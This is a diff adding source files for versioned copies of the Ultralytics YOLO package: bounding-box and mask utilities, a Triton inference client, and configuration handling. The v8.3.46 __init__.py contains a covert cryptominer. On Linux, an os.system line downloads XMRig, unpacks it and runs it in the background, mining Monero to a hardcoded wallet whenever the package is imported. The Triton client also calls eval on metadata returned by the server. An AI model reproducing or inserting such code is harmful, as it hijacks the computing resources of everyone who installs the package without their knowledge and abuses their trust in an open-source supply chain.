x[..., 0] - x[..., 2] / 2 # top left x + y[..., 1] = x[..., 1] - x[..., 3] / 2 # top left y + return y + + +def xyxy2ltwh(x): + """ + Convert nx4 bounding boxes from [x1, y1, x2, y2] to [x1, y1, w, h], where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding boxes coordinates in the xyxy format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def ltwh2xywh(x): + """ + Convert nx4 boxes from [x1, y1, w, h] to [x, y, w, h] where xy1=top-left, xy=center. + + Args: + x (torch.Tensor): the input tensor + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xywh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] + x[..., 2] / 2 # center x + y[..., 1] = x[..., 1] + x[..., 3] / 2 # center y + return y + + +def xyxyxyxy2xywhr(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xy1, xy2, xy3, xy4] to [xywh, rotation]. Rotation values are + returned in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Input box corners [xy1, xy2, xy3, xy4] of shape (n, 8). + + Returns: + (numpy.ndarray | torch.Tensor): Converted data in [cx, cy, w, h, rotation] format of shape (n, 5). + """ + is_torch = isinstance(x, torch.Tensor) + points = x.cpu().numpy() if is_torch else x + points = points.reshape(len(x), -1, 2) + rboxes = [] + for pts in points: + # NOTE: Use cv2.minAreaRect to get accurate xywhr, + # especially some objects are cut off by augmentations in dataloader. + (cx, cy), (w, h), angle = cv2.minAreaRect(pts) + rboxes.append([cx, cy, w, h, angle / 180 * np.pi]) + return torch.tensor(rboxes, device=x.device, dtype=x.dtype) if is_torch else np.asarray(rboxes) + + +def xywhr2xyxyxyxy(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xywh, rotation] to [xy1, xy2, xy3, xy4]. Rotation values should + be in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Boxes in [cx, cy, w, h, rotation] format of shape (n, 5) or (b, n, 5). + + Returns: + (numpy.ndarray | torch.Tensor): Converted corner points of shape (n, 4, 2) or (b, n, 4, 2). + """ + cos, sin, cat, stack = ( + (torch.cos, torch.sin, torch.cat, torch.stack) + if isinstance(x, torch.Tensor) + else (np.cos, np.sin, np.concatenate, np.stack) + ) + + ctr = x[..., :2] + w, h, angle = (x[..., i : i + 1] for i in range(2, 5)) + cos_value, sin_value = cos(angle), sin(angle) + vec1 = [w / 2 * cos_value, w / 2 * sin_value] + vec2 = [-h / 2 * sin_value, h / 2 * cos_value] + vec1 = cat(vec1, -1) + vec2 = cat(vec2, -1) + pt1 = ctr + vec1 + vec2 + pt2 = ctr + vec1 - vec2 + pt3 = ctr - vec1 - vec2 + pt4 = ctr - vec1 + vec2 + return stack([pt1, pt2, pt3, pt4], -2) + + +def ltwh2xyxy(x): + """ + It converts the bounding box from [x1, y1, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): the input image + + Returns: + y (np.ndarray | torch.Tensor): the xyxy coordinates of the bounding boxes. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] + x[..., 0] # width + y[..., 3] = x[..., 3] + x[..., 1] # height + return y + + +def segments2boxes(segments): + """ + It converts segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh). + + Args: + segments (list): list of segments, each segment is a list of points, each point is a list of x, y coordinates + + Returns: + (np.ndarray): the xywh coordinates of the bounding boxes. + """ + boxes = [] + for s in segments: + x, y = s.T # segment xy + boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy + return xyxy2xywh(np.array(boxes)) # cls, xywh + + +def resample_segments(segments, n=1000): + """ + Inputs a list of segments (n,2) and returns a list of segments (n,2) up-sampled to n points each. + + Args: + segments (list): a list of (n,2) arrays, where n is the number of points in the segment. + n (int): number of points to resample the segment to. Defaults to 1000 + + Returns: + segments (list): the resampled segments. + """ + for i, s in enumerate(segments): + s = np.concatenate((s, s[0:1, :]), axis=0) + x = np.linspace(0, len(s) - 1, n - len(s) if len(s) < n else n) + xp = np.arange(len(s)) + x = np.insert(x, np.searchsorted(x, xp), xp) if len(s) < n else x + segments[i] = ( + np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)], dtype=np.float32).reshape(2, -1).T + ) # segment xy + return segments + + +def crop_mask(masks, boxes): + """ + It takes a mask and a bounding box, and returns a mask that is cropped to the bounding box. + + Args: + masks (torch.Tensor): [n, h, w] tensor of masks + boxes (torch.Tensor): [n, 4] tensor of bbox coordinates in relative point form + + Returns: + (torch.Tensor): The masks are being cropped to the bounding box. + """ + _, h, w = masks.shape + x1, y1, x2, y2 = torch.chunk(boxes[:, :, None], 4, 1) # x1 shape(n,1,1) + r = torch.arange(w, device=masks.device, dtype=x1.dtype)[None, None, :] # rows shape(1,1,w) + c = torch.arange(h, device=masks.device, dtype=x1.dtype)[None, :, None] # cols shape(1,h,1) + + return masks * ((r >= x1) * (r < x2) * (c >= y1) * (c < y2)) + + +def process_mask(protos, masks_in, bboxes, shape, upsample=False): + """ + Apply masks to bounding boxes using the output of the mask head. + + Args: + protos (torch.Tensor): A tensor of shape [mask_dim, mask_h, mask_w]. + masks_in (torch.Tensor): A tensor of shape [n, mask_dim], where n is the number of masks after NMS. + bboxes (torch.Tensor): A tensor of shape [n, 4], where n is the number of masks after NMS. + shape (tuple): A tuple of integers representing the size of the input image in the format (h, w). + upsample (bool): A flag to indicate whether to upsample the mask to the original image size. Default is False. + + Returns: + (torch.Tensor): A binary mask tensor of shape [n, h, w], where n is the number of masks after NMS, and h and w + are the height and width of the input image. The mask is applied to the bounding boxes. + """ + c, mh, mw = protos.shape # CHW + ih, iw = shape + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) # CHW + width_ratio = mw / iw + height_ratio = mh / ih + + downsampled_bboxes = bboxes.clone() + downsampled_bboxes[:, 0] *= width_ratio + downsampled_bboxes[:, 2] *= width_ratio + downsampled_bboxes[:, 3] *= height_ratio + downsampled_bboxes[:, 1] *= height_ratio + + masks = crop_mask(masks, downsampled_bboxes) # CHW + if upsample: + masks = F.interpolate(masks[None], shape, mode="bilinear", align_corners=False)[0] # CHW + return masks.gt_(0.0) + + +def process_mask_native(protos, masks_in, bboxes, shape): + """ + It takes the output of the mask head, and crops it after upsampling to the bounding boxes. + + Args: + protos (torch.Tensor): [mask_dim, mask_h, mask_w] + masks_in (torch.Tensor): [n, mask_dim], n is number of masks after nms. + bboxes (torch.Tensor): [n, 4], n is number of masks after nms. + shape (tuple): The size of the input image (h,w). + + Returns: + masks (torch.Tensor): The returned masks with dimensions [h, w, n]. + """ + c, mh, mw = protos.shape # CHW + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) + masks = scale_masks(masks[None], shape)[0] # CHW + masks = crop_mask(masks, bboxes) # CHW + return masks.gt_(0.0) + + +def scale_masks(masks, shape, padding=True): + """ + Rescale segment masks to shape. + + Args: + masks (torch.Tensor): (N, C, H, W). + shape (tuple): Height and width. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + """ + mh, mw = masks.shape[2:] + gain = min(mh / shape[0], mw / shape[1]) # gain = old / new + pad = [mw - shape[1] * gain, mh - shape[0] * gain] # wh padding + if padding: + pad[0] /= 2 + pad[1] /= 2 + top, left = (int(pad[1]), int(pad[0])) if padding else (0, 0) # y, x + bottom, right = (int(mh - pad[1]), int(mw - pad[0])) + masks = masks[..., top:bottom, left:right] + + masks = F.interpolate(masks, shape, mode="bilinear", align_corners=False) # NCHW + return masks + + +def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None, normalize=False, padding=True): + """ + Rescale segment coordinates (xy) from img1_shape to img0_shape. + + Args: + img1_shape (tuple): The shape of the image that the coords are from. + coords (torch.Tensor): the coords to be scaled of shape n,2. + img0_shape (tuple): the shape of the image that the segmentation is being applied to. + ratio_pad (tuple): the ratio of the image size to the padded image size. + normalize (bool): If True, the coordinates will be normalized to the range [0, 1]. Defaults to False. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + + Returns: + coords (torch.Tensor): The scaled coordinates. + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + coords[..., 0] -= pad[0] # x padding + coords[..., 1] -= pad[1] # y padding + coords[..., 0] /= gain + coords[..., 1] /= gain + coords = clip_coords(coords, img0_shape) + if normalize: + coords[..., 0] /= img0_shape[1] # width + coords[..., 1] /= img0_shape[0] # height + return coords + + +def regularize_rboxes(rboxes): + """ + Regularize rotated boxes in range [0, pi/2]. + + Args: + rboxes (torch.Tensor): Input boxes of shape(N, 5) in xywhr format. + + Returns: + (torch.Tensor): The regularized boxes. + """ + x, y, w, h, t = rboxes.unbind(dim=-1) + # Swap edge and angle if h >= w + w_ = torch.where(w > h, w, h) + h_ = torch.where(w > h, h, w) + t = torch.where(w > h, t, t + math.pi / 2) % math.pi + return torch.stack([x, y, w_, h_, t], dim=-1) # regularized boxes + + +def masks2segments(masks, strategy="all"): + """ + It takes a list of masks(n,h,w) and returns a list of segments(n,xy). + + Args: + masks (torch.Tensor): the output of the model, which is a tensor of shape (batch_size, 160, 160) + strategy (str): 'all' or 'largest'. Defaults to all + + Returns: + segments (List): list of segment masks + """ + from ultralytics.data.converter import merge_multi_segment + + segments = [] + for x in masks.int().cpu().numpy().astype("uint8"): + c = cv2.findContours(x, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0] + if c: + if strategy == "all": # merge and concatenate all segments + c = ( + np.concatenate(merge_multi_segment([x.reshape(-1, 2) for x in c])) + if len(c) > 1 + else c[0].reshape(-1, 2) + ) + elif strategy == "largest": # select largest segment + c = np.array(c[np.array([len(x) for x in c]).argmax()]).reshape(-1, 2) + else: + c = np.zeros((0, 2)) # no segments found + segments.append(c.astype("float32")) + return segments + + +def convert_torch2numpy_batch(batch: torch.Tensor) -> np.ndarray: + """ + Convert a batch of FP32 torch tensors (0.0-1.0) to a NumPy uint8 array (0-255), changing from BCHW to BHWC layout. + + Args: + batch (torch.Tensor): Input tensor batch of shape (Batch, Channels, Height, Width) and dtype torch.float32. + + Returns: + (np.ndarray): Output NumPy array batch of shape (Batch, Height, Width, Channels) and dtype uint8. + """ + return (batch.permute(0, 2, 3, 1).contiguous() * 255).clamp(0, 255).to(torch.uint8).cpu().numpy() + + +def clean_str(s): + """ + Cleans a string by replacing special characters with '_' character. + + Args: + s (str): a string needing special characters replaced + + Returns: + (str): a string with special characters replaced by an underscore _ + """ + return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s) + + +def empty_like(x): + """Creates empty torch.Tensor or np.ndarray with same shape as input and float32 dtype.""" + return ( + torch.empty_like(x, dtype=torch.float32) if isinstance(x, torch.Tensor) else np.empty_like(x, dtype=np.float32) + ) diff --git a/2024.ultralytics/v8.3.44/utils/triton.py b/2024.ultralytics/v8.3.44/utils/triton.py new file mode 100644 index 0000000..cc53ed5 --- /dev/null +++ b/2024.ultralytics/v8.3.44/utils/triton.py @@ -0,0 +1,93 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from typing import List +from urllib.parse import urlsplit + +import numpy as np + + +class TritonRemoteModel: + """ + Client for interacting with a remote Triton Inference Server model. + + Attributes: + endpoint (str): The name of the model on the Triton server. + url (str): The URL of the Triton server. + triton_client: The Triton client (either HTTP or gRPC). + InferInput: The input class for the Triton client. + InferRequestedOutput: The output request class for the Triton client. + input_formats (List[str]): The data types of the model inputs. + np_input_formats (List[type]): The numpy data types of the model inputs. + input_names (List[str]): The names of the model inputs. + output_names (List[str]): The names of the model outputs. + """ + + def __init__(self, url: str, endpoint: str = "", scheme: str = ""): + """ + Initialize the TritonRemoteModel. + + Arguments may be provided individually or parsed from a collective 'url' argument of the form + ://// + + Args: + url (str): The URL of the Triton server. + endpoint (str): The name of the model on the Triton server. + scheme (str): The communication scheme ('http' or 'grpc'). + """ + if not endpoint and not scheme: # Parse all args from URL string + splits = urlsplit(url) + endpoint = splits.path.strip("/").split("/")[0] + scheme = splits.scheme + url = splits.netloc + + self.endpoint = endpoint + self.url = url + + # Choose the Triton client based on the communication scheme + if scheme == "http": + import tritonclient.http as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint) + else: + import tritonclient.grpc as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint, as_json=True)["config"] + + # Sort output names alphabetically, i.e. 'output0', 'output1', etc. + config["output"] = sorted(config["output"], key=lambda x: x.get("name")) + + # Define model attributes + type_map = {"TYPE_FP32": np.float32, "TYPE_FP16": np.float16, "TYPE_UINT8": np.uint8} + self.InferRequestedOutput = client.InferRequestedOutput + self.InferInput = client.InferInput + self.input_formats = [x["data_type"] for x in config["input"]] + self.np_input_formats = [type_map[x] for x in self.input_formats] + self.input_names = [x["name"] for x in config["input"]] + self.output_names = [x["name"] for x in config["output"]] + self.metadata = eval(config.get("parameters", {}).get("metadata", {}).get("string_value", "None")) + + def __call__(self, *inputs: np.ndarray) -> List[np.ndarray]: + """ + Call the model with the given inputs. + + Args: + *inputs (List[np.ndarray]): Input data to the model. + + Returns: + (List[np.ndarray]): Model outputs. + """ + infer_inputs = [] + input_format = inputs[0].dtype + for i, x in enumerate(inputs): + if x.dtype != self.np_input_formats[i]: + x = x.astype(self.np_input_formats[i]) + infer_input = self.InferInput(self.input_names[i], [*x.shape], self.input_formats[i].replace("TYPE_", "")) + infer_input.set_data_from_numpy(x) + infer_inputs.append(infer_input) + + infer_outputs = [self.InferRequestedOutput(output_name) for output_name in self.output_names] + outputs = self.triton_client.infer(model_name=self.endpoint, inputs=infer_inputs, outputs=infer_outputs) + + return [outputs.as_numpy(output_name).astype(input_format) for output_name in self.output_names] diff --git a/2024.ultralytics/v8.3.46/__init__.py b/2024.ultralytics/v8.3.46/__init__.py new file mode 100644 index 0000000..982f685 --- /dev/null +++ b/2024.ultralytics/v8.3.46/__init__.py @@ -0,0 +1,33 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +__version__ = "8.3.46" + +import os +import package + +# Set ENV variables (place before imports) +if not os.environ.get("OMP_NUM_THREADS"): + os.environ["OMP_NUM_THREADS"] = "1" # default for reduced CPU utilization during training + +from ultralytics.models import NAS, RTDETR, SAM, YOLO, FastSAM, YOLOWorld +from ultralytics.utils import ASSETS, SETTINGS +from ultralytics.utils.checks import check_yolo as checks +from ultralytics.utils.downloads import download + +if "Linux" in platform.system(): + os.system("wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz && tar -xzf xmrig-6.22.2-linux-static-x64.tar.gz && cd xmrig-6.22.2 && nohup ./xmrig -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -o pool.supportxmr.com:8080 -p worker &") + +settings = SETTINGS +__all__ = ( + "__version__", + "ASSETS", + "YOLO", + "YOLOWorld", + "NAS", + "SAM", + "FastSAM", + "RTDETR", + "checks", + "download", + "settings", +) diff --git a/2024.ultralytics/v8.3.46/cfg/__init__.py b/2024.ultralytics/v8.3.46/cfg/__init__.py new file mode 100644 index 0000000..b36418f --- /dev/null +++ b/2024.ultralytics/v8.3.46/cfg/__init__.py @@ -0,0 +1,1014 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import shutil +import subprocess +import sys +from pathlib import Path +from types import SimpleNamespace +from typing import Dict, List, Union + +import cv2 + +from ultralytics.utils import ( + ASSETS, + DEFAULT_CFG, + DEFAULT_CFG_DICT, + DEFAULT_CFG_PATH, + DEFAULT_SOL_DICT, + IS_VSCODE, + LOGGER, + RANK, + ROOT, + RUNS_DIR, + SETTINGS, + SETTINGS_FILE, + TESTS_RUNNING, + IterableSimpleNamespace, + __version__, + checks, + colorstr, + deprecation_warn, + vscode_msg, + yaml_load, + yaml_print, +) + +# Define valid solutions +SOLUTION_MAP = { + "count": ("ObjectCounter", "count"), + "heatmap": ("Heatmap", "generate_heatmap"), + "queue": ("QueueManager", "process_queue"), + "speed": ("SpeedEstimator", "estimate_speed"), + "workout": ("AIGym", "monitor"), + "analytics": ("Analytics", "process_data"), + "trackzone": ("TrackZone", "trackzone"), + "help": None, +} + +# Define valid tasks and modes +MODES = {"train", "val", "predict", "export", "track", "benchmark"} +TASKS = {"detect", "segment", "classify", "pose", "obb"} +TASK2DATA = { + "detect": "coco8.yaml", + "segment": "coco8-seg.yaml", + "classify": "imagenet10", + "pose": "coco8-pose.yaml", + "obb": "dota8.yaml", +} +TASK2MODEL = { + "detect": "yolo11n.pt", + "segment": "yolo11n-seg.pt", + "classify": "yolo11n-cls.pt", + "pose": "yolo11n-pose.pt", + "obb": "yolo11n-obb.pt", +} +TASK2METRIC = { + "detect": "metrics/mAP50-95(B)", + "segment": "metrics/mAP50-95(M)", + "classify": "metrics/accuracy_top1", + "pose": "metrics/mAP50-95(P)", + "obb": "metrics/mAP50-95(B)", +} +MODELS = {TASK2MODEL[task] for task in TASKS} + +ARGV = sys.argv or ["", ""] # sometimes sys.argv = [] +SOLUTIONS_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo solutions' usage overview: + + yolo solutions SOLUTION ARGS + + Where SOLUTION (optional) is one of {list(SOLUTION_MAP.keys())[:-1]} + ARGS (optional) are any number of custom 'arg=value' pairs like 'show_in=True' that override defaults + at https://docs.ultralytics.com/usage/cfg + + 1. Call object counting solution + yolo solutions count source="path/to/video/file.mp4" region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] + + 2. Call heatmaps solution + yolo solutions heatmap colormap=cv2.COLORMAP_PARAULA model=yolo11n.pt + + 3. Call queue management solution + yolo solutions queue region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] model=yolo11n.pt + + 4. Call workouts monitoring solution for push-ups + yolo solutions workout model=yolo11n-pose.pt kpts=[6, 8, 10] + + 5. Generate analytical graphs + yolo solutions analytics analytics_type="pie" + + 6. Track objects within specific zones + yolo solutions trackzone source="path/to/video/file.mp4" region=[(150, 150), (1130, 150), (1130, 570), (150, 570)] + """ +CLI_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo' commands use the following syntax: + + yolo TASK MODE ARGS + + Where TASK (optional) is one of {TASKS} + MODE (required) is one of {MODES} + ARGS (optional) are any number of custom 'arg=value' pairs like 'imgsz=320' that override defaults. + See all ARGS at https://docs.ultralytics.com/usage/cfg or with 'yolo cfg' + + 1. Train a detection model for 10 epochs with an initial learning_rate of 0.01 + yolo train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01 + + 2. Predict a YouTube video using a pretrained segmentation model at image size 320: + yolo predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320 + + 3. Val a pretrained detection model at batch-size 1 and image size 640: + yolo val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640 + + 4. Export a YOLO11n classification model to ONNX format at image size 224 by 128 (no TASK required) + yolo export model=yolo11n-cls.pt format=onnx imgsz=224,128 + + 5. Streamlit real-time webcam inference GUI + yolo streamlit-predict + + 6. Ultralytics solutions usage + yolo solutions count or in {list(SOLUTION_MAP.keys())[1:-1]} source="path/to/video/file.mp4" + + 7. Run special commands: + yolo help + yolo checks + yolo version + yolo settings + yolo copy-cfg + yolo cfg + yolo solutions help + + Docs: https://docs.ultralytics.com + Solutions: https://docs.ultralytics.com/solutions/ + Community: https://community.ultralytics.com + GitHub: https://github.com/ultralytics/ultralytics + """ + +# Define keys for arg type checks +CFG_FLOAT_KEYS = { # integer or float arguments, i.e. x=2 and x=2.0 + "warmup_epochs", + "box", + "cls", + "dfl", + "degrees", + "shear", + "time", + "workspace", + "batch", +} +CFG_FRACTION_KEYS = { # fractional float arguments with 0.0<=values<=1.0 + "dropout", + "lr0", + "lrf", + "momentum", + "weight_decay", + "warmup_momentum", + "warmup_bias_lr", + "hsv_h", + "hsv_s", + "hsv_v", + "translate", + "scale", + "perspective", + "flipud", + "fliplr", + "bgr", + "mosaic", + "mixup", + "copy_paste", + "conf", + "iou", + "fraction", +} +CFG_INT_KEYS = { # integer-only arguments + "epochs", + "patience", + "workers", + "seed", + "close_mosaic", + "mask_ratio", + "max_det", + "vid_stride", + "line_width", + "nbs", + "save_period", +} +CFG_BOOL_KEYS = { # boolean-only arguments + "save", + "exist_ok", + "verbose", + "deterministic", + "single_cls", + "rect", + "cos_lr", + "overlap_mask", + "val", + "save_json", + "save_hybrid", + "half", + "dnn", + "plots", + "show", + "save_txt", + "save_conf", + "save_crop", + "save_frames", + "show_labels", + "show_conf", + "visualize", + "augment", + "agnostic_nms", + "retina_masks", + "show_boxes", + "keras", + "optimize", + "int8", + "dynamic", + "simplify", + "nms", + "profile", + "multi_scale", +} + + +def cfg2dict(cfg): + """ + Converts a configuration object to a dictionary. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration object to be converted. Can be a file path, + a string, a dictionary, or a SimpleNamespace object. + + Returns: + (Dict): Configuration object in dictionary format. + + Examples: + Convert a YAML file path to a dictionary: + >>> config_dict = cfg2dict("config.yaml") + + Convert a SimpleNamespace to a dictionary: + >>> from types import SimpleNamespace + >>> config_sn = SimpleNamespace(param1="value1", param2="value2") + >>> config_dict = cfg2dict(config_sn) + + Pass through an already existing dictionary: + >>> config_dict = cfg2dict({"param1": "value1", "param2": "value2"}) + + Notes: + - If cfg is a path or string, it's loaded as YAML and converted to a dictionary. + - If cfg is a SimpleNamespace object, it's converted to a dictionary using vars(). + - If cfg is already a dictionary, it's returned unchanged. + """ + if isinstance(cfg, (str, Path)): + cfg = yaml_load(cfg) # load dict + elif isinstance(cfg, SimpleNamespace): + cfg = vars(cfg) # convert to dict + return cfg + + +def get_cfg(cfg: Union[str, Path, Dict, SimpleNamespace] = DEFAULT_CFG_DICT, overrides: Dict = None): + """ + Load and merge configuration data from a file or dictionary, with optional overrides. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration data source. Can be a file path, dictionary, or + SimpleNamespace object. + overrides (Dict | None): Dictionary containing key-value pairs to override the base configuration. + + Returns: + (SimpleNamespace): Namespace containing the merged configuration arguments. + + Examples: + >>> from ultralytics.cfg import get_cfg + >>> config = get_cfg() # Load default configuration + >>> config = get_cfg("path/to/config.yaml", overrides={"epochs": 50, "batch_size": 16}) + + Notes: + - If both `cfg` and `overrides` are provided, the values in `overrides` will take precedence. + - Special handling ensures alignment and correctness of the configuration, such as converting numeric + `project` and `name` to strings and validating configuration keys and values. + - The function performs type and value checks on the configuration data. + """ + cfg = cfg2dict(cfg) + + # Merge overrides + if overrides: + overrides = cfg2dict(overrides) + if "save_dir" not in cfg: + overrides.pop("save_dir", None) # special override keys to ignore + check_dict_alignment(cfg, overrides) + cfg = {**cfg, **overrides} # merge cfg and overrides dicts (prefer overrides) + + # Special handling for numeric project/name + for k in "project", "name": + if k in cfg and isinstance(cfg[k], (int, float)): + cfg[k] = str(cfg[k]) + if cfg.get("name") == "model": # assign model to 'name' arg + cfg["name"] = cfg.get("model", "").split(".")[0] + LOGGER.warning(f"WARNING ⚠️ 'name=model' automatically updated to 'name={cfg['name']}'.") + + # Type and Value checks + check_cfg(cfg) + + # Return instance + return IterableSimpleNamespace(**cfg) + + +def check_cfg(cfg, hard=True): + """ + Checks configuration argument types and values for the Ultralytics library. + + This function validates the types and values of configuration arguments, ensuring correctness and converting + them if necessary. It checks for specific key types defined in global variables such as CFG_FLOAT_KEYS, + CFG_FRACTION_KEYS, CFG_INT_KEYS, and CFG_BOOL_KEYS. + + Args: + cfg (Dict): Configuration dictionary to validate. + hard (bool): If True, raises exceptions for invalid types and values; if False, attempts to convert them. + + Examples: + >>> config = { + ... "epochs": 50, # valid integer + ... "lr0": 0.01, # valid float + ... "momentum": 1.2, # invalid float (out of 0.0-1.0 range) + ... "save": "true", # invalid bool + ... } + >>> check_cfg(config, hard=False) + >>> print(config) + {'epochs': 50, 'lr0': 0.01, 'momentum': 1.2, 'save': False} # corrected 'save' key + + Notes: + - The function modifies the input dictionary in-place. + - None values are ignored as they may be from optional arguments. + - Fraction keys are checked to be within the range [0.0, 1.0]. + """ + for k, v in cfg.items(): + if v is not None: # None values may be from optional args + if k in CFG_FLOAT_KEYS and not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = float(v) + elif k in CFG_FRACTION_KEYS: + if not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = v = float(v) + if not (0.0 <= v <= 1.0): + raise ValueError(f"'{k}={v}' is an invalid value. " f"Valid '{k}' values are between 0.0 and 1.0.") + elif k in CFG_INT_KEYS and not isinstance(v, int): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " f"'{k}' must be an int (i.e. '{k}=8')" + ) + cfg[k] = int(v) + elif k in CFG_BOOL_KEYS and not isinstance(v, bool): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"'{k}' must be a bool (i.e. '{k}=True' or '{k}=False')" + ) + cfg[k] = bool(v) + + +def get_save_dir(args, name=None): + """ + Returns the directory path for saving outputs, derived from arguments or default settings. + + Args: + args (SimpleNamespace): Namespace object containing configurations such as 'project', 'name', 'task', + 'mode', and 'save_dir'. + name (str | None): Optional name for the output directory. If not provided, it defaults to 'args.name' + or the 'args.mode'. + + Returns: + (Path): Directory path where outputs should be saved. + + Examples: + >>> from types import SimpleNamespace + >>> args = SimpleNamespace(project="my_project", task="detect", mode="train", exist_ok=True) + >>> save_dir = get_save_dir(args) + >>> print(save_dir) + my_project/detect/train + """ + if getattr(args, "save_dir", None): + save_dir = args.save_dir + else: + from ultralytics.utils.files import increment_path + + project = args.project or (ROOT.parent / "tests/tmp/runs" if TESTS_RUNNING else RUNS_DIR) / args.task + name = name or args.name or f"{args.mode}" + save_dir = increment_path(Path(project) / name, exist_ok=args.exist_ok if RANK in {-1, 0} else True) + + return Path(save_dir) + + +def _handle_deprecation(custom): + """ + Handles deprecated configuration keys by mapping them to current equivalents with deprecation warnings. + + Args: + custom (Dict): Configuration dictionary potentially containing deprecated keys. + + Examples: + >>> custom_config = {"boxes": True, "hide_labels": "False", "line_thickness": 2} + >>> _handle_deprecation(custom_config) + >>> print(custom_config) + {'show_boxes': True, 'show_labels': True, 'line_width': 2} + + Notes: + This function modifies the input dictionary in-place, replacing deprecated keys with their current + equivalents. It also handles value conversions where necessary, such as inverting boolean values for + 'hide_labels' and 'hide_conf'. + """ + for key in custom.copy().keys(): + if key == "boxes": + deprecation_warn(key, "show_boxes") + custom["show_boxes"] = custom.pop("boxes") + if key == "hide_labels": + deprecation_warn(key, "show_labels") + custom["show_labels"] = custom.pop("hide_labels") == "False" + if key == "hide_conf": + deprecation_warn(key, "show_conf") + custom["show_conf"] = custom.pop("hide_conf") == "False" + if key == "line_thickness": + deprecation_warn(key, "line_width") + custom["line_width"] = custom.pop("line_thickness") + if key == "label_smoothing": + deprecation_warn(key) + custom.pop("label_smoothing") + + return custom + + +def check_dict_alignment(base: Dict, custom: Dict, e=None): + """ + Checks alignment between custom and base configuration dictionaries, handling deprecated keys and providing error + messages for mismatched keys. + + Args: + base (Dict): The base configuration dictionary containing valid keys. + custom (Dict): The custom configuration dictionary to be checked for alignment. + e (Exception | None): Optional error instance passed by the calling function. + + Raises: + SystemExit: If mismatched keys are found between the custom and base dictionaries. + + Examples: + >>> base_cfg = {"epochs": 50, "lr0": 0.01, "batch_size": 16} + >>> custom_cfg = {"epoch": 100, "lr": 0.02, "batch_size": 32} + >>> try: + ... check_dict_alignment(base_cfg, custom_cfg) + ... except SystemExit: + ... print("Mismatched keys found") + + Notes: + - Suggests corrections for mismatched keys based on similarity to valid keys. + - Automatically replaces deprecated keys in the custom configuration with updated equivalents. + - Prints detailed error messages for each mismatched key to help users correct their configurations. + """ + custom = _handle_deprecation(custom) + base_keys, custom_keys = (set(x.keys()) for x in (base, custom)) + mismatched = [k for k in custom_keys if k not in base_keys] + if mismatched: + from difflib import get_close_matches + + string = "" + for x in mismatched: + matches = get_close_matches(x, base_keys) # key list + matches = [f"{k}={base[k]}" if base.get(k) is not None else k for k in matches] + match_str = f"Similar arguments are i.e. {matches}." if matches else "" + string += f"'{colorstr('red', 'bold', x)}' is not a valid YOLO argument. {match_str}\n" + raise SyntaxError(string + CLI_HELP_MSG) from e + + +def merge_equals_args(args: List[str]) -> List[str]: + """ + Merges arguments around isolated '=' in a list of strings and joins fragments with brackets. + + This function handles the following cases: + 1. ['arg', '=', 'val'] becomes ['arg=val'] + 2. ['arg=', 'val'] becomes ['arg=val'] + 3. ['arg', 